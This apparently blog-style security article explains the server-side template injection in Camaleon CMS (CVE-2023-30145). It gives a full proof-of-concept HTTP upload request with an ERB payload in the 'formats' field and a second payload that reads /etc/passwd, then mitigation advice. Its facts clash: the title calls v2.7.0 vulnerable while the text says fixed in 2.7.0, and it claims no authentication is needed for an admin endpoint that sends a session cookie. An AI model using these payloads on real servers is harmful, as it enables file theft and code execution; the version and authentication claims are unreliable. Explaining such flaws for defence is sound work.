Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)

Camaleon CMS v2.7.0 Server-Side Template Injection (SSTI): A Deep Dive into CVE-2023-30145

Server-Side Template Injection (SSTI) is a critical vulnerability that allows attackers to execute arbitrary code on the server by manipulating template rendering logic. In the case of Camaleon CMS v2.7.0, a flaw in the formats parameter enables remote code execution, leading to full system compromise. This vulnerability, identified as CVE-2023-30145, was disclosed by cybersecurity researcher Parag Bagul and affects all versions prior to 2.7.0.

Understanding SSTI: The Core Mechanism

SSTI occurs when a web application uses a template engine (e.g., ERB, Jinja2, Liquid) to render dynamic content, but fails to properly sanitize user input. If an attacker can inject malicious template syntax into a parameter, the server may evaluate it during rendering, resulting in unintended code execution.

Camaleon CMS uses a Ruby-based template engine, which supports syntax like <%= ... %> for evaluating expressions. When the formats parameter is processed without proper validation, it becomes a vector for SSTI attacks.

Exploitation Path: Step-by-Step Analysis

Attackers exploit this vulnerability through a simple yet powerful method:

• Access the /admin/media/upload endpoint.
• Upload a file and intercept the request using tools like Burp Suite.
• Modify the formats parameter to include template injection payloads.
• Observe the server’s response to verify template evaluation.

Proof-of-Concept: Basic SSTI Payload

POST /admin/media/upload?actions=false HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.com/admin/profile/edit
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------327175120238370517612522354688
Content-Length: 1200
Origin: http://target.com
DNT: 1
Connection: close
Cookie: cookie

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="file_upload"; filename="test.txt"
Content-Type: text/plain

test

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="versions"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="thumb_size"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="formats"

test<%= 7*7 %>test

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="media_formats"

image

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="dimension"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="private"

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="folder"

/

-----------------------------327175120238370517612522354688
Content-Disposition: form-data; name="skip_auto_crop"

true

-----------------------------327175120238370517612522354688--

Explanation: The payload test<%= 7*7 %>test is injected into the formats field. The template engine evaluates 7*7 and returns 49. The response includes File format not allowed (test49test), confirming that the server processed the template expression.

Advanced Exploitation: Reading Sensitive Files

Once SSTI is confirmed, attackers can escalate privileges by reading sensitive files. The following payload demonstrates how to access /etc/passwd:

testqopi<%= File.open('/etc/passwd').read %>fdtest

Explanation: This payload uses Ruby’s File.open method to read the system password file. The response will include the file’s contents, such as:

root:x:0:0:root:/root:/bin/bash

Such data leakage exposes critical system information, enabling further exploitation like credential harvesting or privilege escalation.

Impact and Risk Assessment

Risk Level	High
CVSS Score	9.8 (Critical)
Attack Vector	Remote
Exploitability	Easy
Authentication Required	No

Due to the lack of input validation and the use of a powerful template engine, Camaleon CMS becomes a prime target for attackers with minimal technical skill. The vulnerability allows full server access, including file reading, command execution, and potentially reverse shell establishment.

Prevention and Mitigation Strategies

Organizations using Camaleon CMS must:

• Upgrade immediately to version 2.7.0 or later.
• Sanitize all user inputs before passing them to template engines.
• Disable template evaluation for untrusted data.
• Implement strict input validation using whitelisting or regex patterns.
• Use secure template engines with built-in sandboxing (e.g., SafeERB).

Best Practices for Developers

When designing web applications with template engines:

• Never allow user-controlled input to directly influence template rendering.
• Use parameterized templates or pre-compiled templates.
• Log and monitor any template evaluation attempts.
• Apply the principle of least privilege: restrict file access and system calls.

For security teams, regular vulnerability scanning and penetration testing should include SSTI checks, especially in admin panels and file upload endpoints.

Conclusion

CVE-2023-30145 in Camaleon CMS v2.7.0 serves as a stark reminder of how a seemingly minor input field can become a gateway to complete system compromise. SSTI vulnerabilities are not just theoretical—they are actively exploited in real-world attacks. By understanding the mechanics, recognizing the signs, and applying robust mitigation strategies, organizations can defend against such threats effectively.